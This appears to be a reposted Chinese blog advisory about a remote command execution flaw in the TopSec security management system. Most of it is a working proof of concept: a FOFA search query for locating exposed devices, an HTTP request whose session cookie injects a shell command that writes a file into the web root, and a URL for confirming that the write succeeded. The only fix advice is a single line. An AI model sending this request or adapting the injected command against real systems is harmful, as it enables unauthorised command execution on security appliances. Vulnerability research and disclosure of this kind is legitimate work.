热门标签
热门文章
- 1产品经理-一份标准需求文档的8个模块(14)
- 2探索区块链:颠覆性技术的崛起
- 3深度学习的应用实例_结合所学知识,请说明至少一项深度学习的应用案例。(需简单列明所选案例相关领域,
- 4Nginx七层(应用层)反向代理:UWSGI代理uwsgi_pass篇
- 5nginx代理gitee
- 6Python Asyncio网络编程方法全面解析与实战应用!_python asyncio server
- 7openpyxl中文文档_openpyxl官方文档中文版
- 8Robertamodel
- 9服务器重装后,mac无法连接服务器,处理方法_mac重装系统无法连接服务器
- 10Centos7.9安装SQLserver2017数据库_centos7.9 启动mssql
当前位置: article > 正文
天融信TOPSEC安全管理系统存在远程命令执行漏洞_天融信防火墙漏洞
作者:黑客灵魂 | 2024-07-13 07:06:35
赞
踩
天融信防火墙漏洞
产品简介
天融信TopSec 安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等。
漏洞概述
安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。
指纹识别
fofa:
title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"
- 1
漏洞利用
poc:
GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 10
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Cookie: session_id_443=1|echo 'hhh' >> /www/htdocs/site/image/hhh.txt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Connection: close
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
验证url:
https://you_ip/site/image/hhh.txt
- 1
修复建议
联系软件厂商更新至最新安全版本
【陆上行舟。】
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/818173
推荐阅读
相关标签
